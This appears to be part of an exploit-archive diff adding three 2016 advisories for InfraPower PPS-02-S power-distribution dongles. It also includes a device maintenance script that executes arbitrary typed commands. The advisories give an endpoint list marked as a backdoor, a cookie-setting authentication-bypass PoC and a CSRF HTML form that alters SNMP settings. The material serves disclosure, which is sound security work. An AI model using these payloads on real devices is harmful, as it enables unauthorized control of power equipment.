echo "Patching SNMP and its modules...done"
else
echo "file not exist: /www/patch/snmplink.sh"
fi
fi
;;
"B")
echo "(B) Restore Box Configuration(box_conf) "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/etc/box_conf" ]; then
echo "Patching /mnt/mtd/box_conf..."
cp /etc/box_conf /mnt/mtd/box_conf
if [ -f "/mnt/mtd/box_conf" ]; then
echo "Patching /mnt/mtd/box_conf...done"
else
echo "Patching /mnt/mtd/box_conf...failed"
fi
else
echo "file not exist: /etc/box_conf"
fi
fi
;;
"P")
INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1`
echo "(P) Restore INI, POL profiles for $INFRA_VER "
echo -n "Are you sure to continue? [y/n]:"
read ansP
if [ "$ansP" == "y" ]; then
if [ "$InfraType" == "1" ]; then
echo "Restoring INI, POL profiles for $INFRA_VER..."
if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then
echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..."
cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini
echo "...done"
fi
if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then
echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..."
cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol
echo "...done"
fi
if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then
echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..."
cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini
echo "...done"
fi
if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then
echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..."
cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol
echo "...done"
fi
if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then
echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..."
cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini
echo "...done"
fi
if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then
echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..."
cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol
echo "...done"
fi
if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then
echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..."
cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini
echo "...done"
fi
if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then
echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..."
cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol
echo "...done"
fi
fi
fi
;;
"E")
echo -n "Input command line:"
read cmd_line
$cmd_line
;;
"M")
if [ -f "/mnt/mtd/log_memCheck.txt" ]; then
cat /mnt/mtd/log_memCheck.txt
fi
;;
"R")
echo "(R) Reboot "
echo -n "Are you sure to continue? [y/n]:"
read ansR
if [ "$ansR" == "y" ]; then
echo "Rebooting..."
reboot
fi
;;
"X")
echo "su mode started!"
su
;;
"Q")
echo "Leaving maintenance mode........OK"
exit 0
;;
esac
done

54
platforms/php/webapps/40644.txt Executable file
View file

@ -0,0 +1,54 @@
InfraPower PPS-02-S Q213V1 Insecure Direct Object Reference Authorization Bypass
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: Insecure Direct Object References occur when an application
provides direct access to objects based on user-supplied input. As
a result of this vulnerability attackers can bypass authorization
and access resources and functionalities in the system directly, for
example APIs, files, upload utilities, device settings, etc.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5373
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5373.php
27.09.2016
--
GET /ConnPort.php
GET /CSSSource.php
GET /dball.php
GET /doupgrate.php
GET /IPSettings.php
GET /ListFile.php
GET /Menu.php
GET /Ntp.php
GET /PDUDetails_Ajax_Details.php
GET /PDULog.php
GET /PortSettings.php
GET /production_test1.php ("backdoor")
GET /UploadEXE.php

142
platforms/php/webapps/40645.txt Executable file
View file

@ -0,0 +1,142 @@
InfraPower PPS-02-S Q213V1 Authentication Bypass Vulnerability
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: The device does not properly perform authentication, allowing
it to be bypassed through cookie manipulation. The vulnerable function
checkLogin() in 'Function.php' checks only if the 'Login' Cookie is empty
or not, allowing easy bypass of the user security mechanisms.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5374
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5374.php
27.09.2016
--
(example) System.php:
---------------------
1: <?php
2:
3: require_once("Function.php");
4: session_start();
5: if(!checkLogin())
6: header('Location: Login.php');
7:
---------------------------------------
Function.php:
-------------
155: function checkLogin(){
156: if(empty($_SESSION['Login']))
157: return false;
158: return true;
159: }
160:
--------------------
'Sessioned' scripts:
➜ www grep -rHn 'session_start' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Login.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:9: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/System.php:4: session_start();
/Users/liwomac/Desktop/infrapower_files/www/User.php:3: session_start();
➜ www grep -rHn 'session_destroy' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:256: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Function.php:266: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:7: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:53: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:63: session_destroy();
➜ www grep -rHn '$_SESSION' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:11: if(isset($_SESSION['ite'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:12: $this->init($_SESSION['ite']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:156: if(empty($_SESSION['Login']))
/Users/liwomac/Desktop/infrapower_files/www/Function.php:233: if(!isset($_SESSION['TimeSync'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:234: $_SESSION['TimeSync'] = getConf("/mnt/mtd/main_conf", "TimeSyncPDU_opt");
/Users/liwomac/Desktop/infrapower_files/www/Function.php:235: if($_SESSION['TimeSync'] == "ON"){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:237: $_SESSION['SyncDate'] = explode(":",$SyncDate);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:239: $_SESSION['TimeSync'] = "OFF";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:240: $_SESSION['SyncDate'][0] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:241: $_SESSION['SyncDate'][1] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:255: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:265: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Login.php:31: $_SESSION['ite'] = substr($this->InfraType,1,1); // e.g."t3v3" get the second chr 3;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:64: $_SESSION['ite'] = "1";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:67: $_SESSION['ite'] = "2";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:70: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:73: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:76: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:79: $_SESSION['ite'] = "4";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:82: $_SESSION['ite'] = FALSE;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:91:$_SESSION['ite'] = $InfraType;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:137: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:140: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:156: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Login.php:167: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:3: $_SESSION['Login'];
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:4: if (isset($_SESSION['Login'])){
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:5: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Menu.php:60: /*if ($_SESSION["SS_SystemCreated"] == "1") {
/Users/liwomac/Desktop/infrapower_files/www/System.php:52: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/System.php:62: unset($_SESSION['Login']);
➜ www grep -rHn 'checkLogin' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Function.php:155: function checkLogin(){
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Login.php:165: if(checkLogin()) {
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:10: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/System.php:5: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/User.php:4: if(!checkLogin())
PoC:
javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT"
--

53
platforms/php/webapps/40646.txt Executable file
View file

@ -0,0 +1,53 @@
InfraPower PPS-02-S Q213V1 Cross-Site Request Forgery
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with admin
privileges if a logged-in user visits a malicious web site.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5375
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5375.php
27.09.2016
--
PoC:
<html>
<body>
<form action="http://192.168.0.17/SNMP.php?Menu=SMP" method="POST">
<input type="hidden" name="SNMPAgent" value="Enable" />
<input type="hidden" name="CommuintyString" value="public" />
<input type="hidden" name="CommuintyWrite" value="private" />
<input type="hidden" name="TrapsVersion" value="v2Trap" />
<input type="hidden" name="IP" value="192&#46;168&#46;0&#46;254" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>